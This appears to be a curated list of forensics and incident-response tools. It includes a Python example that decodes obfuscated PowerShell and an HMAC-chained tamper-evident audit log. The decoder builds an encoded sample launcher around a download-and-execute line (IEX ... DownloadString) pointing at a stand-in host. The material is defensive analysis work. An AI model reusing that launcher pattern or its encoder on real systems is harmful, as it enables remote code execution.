uac: UAC is a live response collection script for incident response that uses native binaries and tools to automate artifact collection on AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris systems. (✭ 260)
mac_apt: macOS Artifact Parsing Tool. (✭ 329)
Userline: Query and report user logon relations from MS Windows Security Events. (✭ 221)
Linuxforensics: Everything related to Linux forensics. (✭ 189)
Recuperabit: A tool for forensic file system reconstruction. (✭ 280)
ir-rescue: A Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response. (✭ 311)
Timesketch: Collaborative forensic timeline analysis. (✭ 1,795)
dnslog: Minimalistic DNS logging tool. (✭ 40)
ad-privileged-audit: Provides various Windows Server Active Directory (AD) security-focused reports. (✭ 42)
swap_digger: A tool that automates Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches it for Linux user credentials, web form credentials, web form e-mail addresses, HTTP basic authentication credentials, Wi-Fi SSIDs and keys, etc. (✭ 354)
GetConsoleHistoryAndOutput: An incident response tool to extract console command history and the screen output buffer. (✭ 41)
RdpCacheStitcher: A tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps. (✭ 176)
EventTranscriptParser: Python-based tool to extract forensic information from EventTranscript.db (Windows Diagnostic Data). (✭ 22)
ir scripts: Incident response scripts. (✭ 17)
Pypowershellxray: Python script to decode common encoded PowerShell scripts. (✭ 192)
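The decoding Pypowershellxray automates is mechanical enough to show in a few lines. The block below is an added example written for this page, not Pypowershellxray's code: it peels the two layers most encoded launchers use (the -EncodedCommand argument, which is base64 over UTF-16LE, and an inner [Convert]::FromBase64String(...) payload that is often gzip- or deflate-compressed). INNER_SCRIPT, the launcher template in build_sample and the URL are constructed for the example; the GzipStream/DeflateStream class names are the real .NET ones such launchers reference.

```python
import base64
import gzip
import re
import zlib

# Constructed inner payload for this example (non-routable host, nothing fetched).
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

# PowerShell is case-insensitive, so match FromBase64String in any casing.
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)


def decode_encoded_command(arg: str) -> str:
    """Decode the argument of -EncodedCommand / -enc: base64 over UTF-16LE."""
    return base64.b64decode(arg, validate=True).decode("utf-16-le")


def try_decompress(blob: bytes) -> bytes:
    """Undo the GzipStream / DeflateStream wrapper seen in launchers.
    .NET DeflateStream writes raw deflate (no zlib header), so check for the
    gzip magic first, then try raw deflate, and return the input unchanged
    if neither applies."""
    if blob[:2] == b"\x1f\x8b":
        return gzip.decompress(blob)
    try:
        return zlib.decompress(blob, -zlib.MAX_WBITS)
    except zlib.error:
        return blob


def unwrap_layers(script: str, max_depth: int = 5) -> list:
    """Return [layer0, layer1, ...]: layer0 is the decoded script and each
    later layer is the content of the first FromBase64String literal found in
    the previous layer, decompressed if needed. max_depth caps the recursion."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_RE.search(layers[-1])
        if not m:
            break
        blob = try_decompress(base64.b64decode(m.group(1)))
        try:
            text = blob.decode("utf-8")
        except UnicodeDecodeError:
            # some launchers embed a second UTF-16LE script
            text = blob.decode("utf-16-le", errors="replace")
        layers.append(text)
    return layers


def build_sample(mode: str = "gzip") -> str:
    """Construct a two-layer launcher for this example: INNER_SCRIPT compressed
    with gzip or raw deflate, wrapped in a FromBase64String decoder stub, and
    the whole thing encoded the way -EncodedCommand expects."""
    if mode == "gzip":
        packed = gzip.compress(INNER_SCRIPT.encode("utf-8"))
        stream = "IO.Compression.GzipStream"
    else:
        c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
        packed = c.compress(INNER_SCRIPT.encode("utf-8")) + c.flush()
        stream = "IO.Compression.DeflateStream"
    launcher = (
        "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('%s'));"
        "IEX (New-Object IO.StreamReader(New-Object %s($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
        % (base64.b64encode(packed).decode(), stream)
    )
    return base64.b64encode(launcher.encode("utf-16-le")).decode()


if __name__ == "__main__":
    for i, layer in enumerate(unwrap_layers(decode_encoded_command(build_sample()))):
        print("layer %d: %s" % (i, layer))
```

When running this over real process command lines, take the -EncodedCommand argument from the process creation event (Sysmon 1 or Security 4688 with command-line auditing on); the max_depth cap matters because some loaders nest half a dozen layers and a malformed sample should not recurse forever.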
ADTimeline: Timeline of Active Directory changes with replication metadata. (✭ 252)
hayabusa: Hayabusa (隼) is a Sigma-based threat hunting and fast forensics timeline generator for Windows event logs. (✭ 908)
INDXRipper: Carve file metadata from NTFS index ($I30) attributes. (✭ 32)
MemLabs: Educational, CTF-styled labs for individuals interested in memory forensics. (✭ 696)
MindMaps: #ThreatHunting #DFIR #Malware #Detection mind maps. (✭ 224)
smram_parse: System Management RAM (SMRAM) analysis tool. (✭ 50)
LevelDBDumper: Dumps all of the key/value pairs from a LevelDB database. (✭ 23)
PSTrace: Trace ScriptBlock execution for PowerShell v2. (✭ 38)
Hindsight: Web browser forensics for Google Chrome/Chromium. (✭ 589)
Packrat: Live system forensic collector. (✭ 16)
Turbinia: Automation and scaling of digital forensics tools. (✭ 461)
WELA: WELA (Windows Event Log Analyzer): the Swiss Army knife for Windows event logs! ゑ羅(ウェラ) (✭ 442)
MEAT: This toolkit aims to help forensicators perform different kinds of acquisitions on iOS devices. (✭ 101)
CDIR: CDIR (Cyber Defense Institute Incident Response) Collector, a live collection tool built on open source tools and libraries. (✭ 122)
CCXDigger: The CyberCX Digger project is designed to help Australian organisations determine whether they have been impacted by certain high-profile cyber security incidents. Digger provides threat hunting functionality packaged in a simple-to-use tool, allowing users to detect certain attacker activities, all for free. (✭ 45)
DFIR-O365RC: PowerShell module for Office 365 and Azure log collection. (✭ 158)
Autotimeliner: Automagically extract a forensic timeline from a volatile memory dump. (✭ 54)
Diffy: Diffy is a triage tool used during cloud-centric security incidents to help digital forensics and incident response (DFIR) teams quickly identify suspicious hosts on which to focus their response. (✭ 555)
Operative Framework: operative framework is an OSINT investigation framework: you can interact with multiple targets, execute multiple modules, create links between targets, export reports to PDF, add notes to a target or to results, interact with a RESTful API, and write your own modules. (✭ 511)
Beagle: Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (✭ 976)
SeqBox: A single-file container/archive that can be reconstructed even after total loss of file system structures. (✭ 480)
Plaso: Super timeline all the things. (✭ 1,055)
Forensic Tools: CIRCL system forensic tools, a collection of tools to support forensic work. (✭ 27)
Awesome Forensics: Awesome forensics resources: almost 300 open source forensics tools and 600 blog posts about forensics. (✭ 446)
ThreatIngestor: Extract and aggregate threat intelligence. (✭ 439)
pcapfs: A FUSE module to mount captured network data. (✭ 17)
Gosint: OSINT Swiss Army knife. (✭ 401)
Mimir: Smart OSINT collection of common IOC types. (✭ 63)
Scripting: PS / Bash / Python / other scripts, for fun! (✭ 47)
Artifacts: 📇 Digital Forensics Artifact Repository (forensicanalysis edition). (✭ 21)
Pig: A Linux packet crafting tool. (✭ 384)
Zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. (✭ 4,180)
tr1pd: Tamper-resistant audit log. (✭ 13)
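"Tamper-resistant audit log" in the tr1pd entry above names a property rather than a mechanism, so here is the generic construction behind it as an added example (written for this page, not tr1pd's design or code): each record carries an HMAC over its sequence number, the previous record's tag and its message, so editing, deleting or reordering any record breaks the chain from that point on. The key and the records are constructed for the example. The one thing the chain alone cannot catch is truncation of the tail, which is why verify() accepts an externally anchored head tag.

```python
import hashlib
import hmac

GENESIS = b"\x00" * 32   # tag that the first record chains to


def seal(key: bytes, seq: int, prev: bytes, msg: str) -> bytes:
    """HMAC-SHA256 over (seq || prev_tag || msg); binds each record to its place."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    h.update(seq.to_bytes(8, "big"))
    h.update(prev)
    h.update(msg.encode("utf-8"))
    return h.digest()


class AuditLog:
    """Append-only log; self.head is the tag of the last record and is what
    should be shipped off-host (remote syslog, signed heartbeat, TPM NV index)
    so a verifier can detect a truncated tail."""

    def __init__(self, key: bytes):
        self.key = key
        self.records = []
        self.head = GENESIS

    def append(self, msg: str) -> dict:
        seq = len(self.records)
        tag = seal(self.key, seq, self.head, msg)
        rec = {"seq": seq, "msg": msg, "prev": self.head.hex(), "tag": tag.hex()}
        self.records.append(rec)
        self.head = tag
        return rec


def verify(key: bytes, records: list, expected_head: bytes = None) -> tuple:
    """Return (ok, first_bad_index). Walks the chain from GENESIS; a record whose
    seq, prev or tag does not fit is reported by position. If expected_head is
    given (the anchored tag of the last record the writer produced), a chain
    that validates but ends early is reported as bad at index len(records)."""
    prev = GENESIS
    for i, rec in enumerate(records):
        if rec["seq"] != i or bytes.fromhex(rec["prev"]) != prev:
            return (False, i)
        tag = seal(key, i, prev, rec["msg"])
        if not hmac.compare_digest(tag, bytes.fromhex(rec["tag"])):
            return (False, i)
        prev = tag
    if expected_head is not None and not hmac.compare_digest(prev, expected_head):
        return (False, len(records))   # tail truncated, or records missing at the end
    return (True, -1)


if __name__ == "__main__":
    # constructed records for the example
    log = AuditLog(b"example-key-kept-off-the-logged-host")
    for m in ("login alice", "sudo alice", "logout alice"):
        log.append(m)
    print(verify(log.key, log.records, log.head))        # (True, -1)
    tampered = [dict(r) for r in log.records]
    tampered[1]["msg"] = "sudo bob"
    print(verify(log.key, tampered))                      # (False, 1)
    print(verify(log.key, log.records[:2]))               # (True, -1): truncation alone is invisible
    print(verify(log.key, log.records[:2], log.head))     # (False, 2): caught with the anchored head
```

The key must live somewhere the writer can use but a local attacker cannot read; if it sits next to the log, an attacker who can edit the log can also re-seal it. Per-record keys derived by a forward-secure ratchet (hash the key after every append) close that hole for past records, at the cost of needing the initial key only on the verifier.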
Lookyloo: Lookyloo is a web interface that lets users capture a website page and then displays a tree of the domains that call each other. (✭ 381)
Infosec reference: An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for the non-MS Git-hosted version. (✭ 4,162)
Yeti: Your Everyday Threat Intelligence. (✭ 1,037)
Gensum: Powerful checksum generator! (✭ 12)
SIFT: SIFT (SANS Investigative Forensic Toolkit). (✭ 355)
kAudit: Alcide Kubernetes Audit Log Analyzer (Alcide kAudit). (✭ 23)
TheHiveDocs: Documentation of TheHive. (✭ 353)
Metaforge: An OSINT metadata analysis tool that filters through tags and creates reports. (✭ 63)